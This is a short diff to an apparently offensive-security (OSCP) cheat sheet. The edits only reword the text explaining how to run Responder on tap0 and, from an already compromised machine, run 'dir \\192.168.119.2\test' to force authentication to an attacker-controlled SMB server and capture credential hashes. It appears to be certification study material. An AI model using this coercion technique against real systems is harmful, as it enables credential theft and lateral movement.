peterkhe1999/CheatSheet/OSCP/README.md

 sudo responder -I tap0
 ```

-If we've **obtained code execution** on a remote system, we can easily force it to authenticate with us by commanding it to connect to our prepared SMB server.
+If we've **obtained code execution** on a remote system, force it to authenticate with us by commanding it to connect to our prepared SMB server.

-Assuming our Responder is listening on 192.168.119.2
+Assuming our Responder is listening on `192.168.119.2`.

 ```pwsh
 dir \\192.168.119.2\test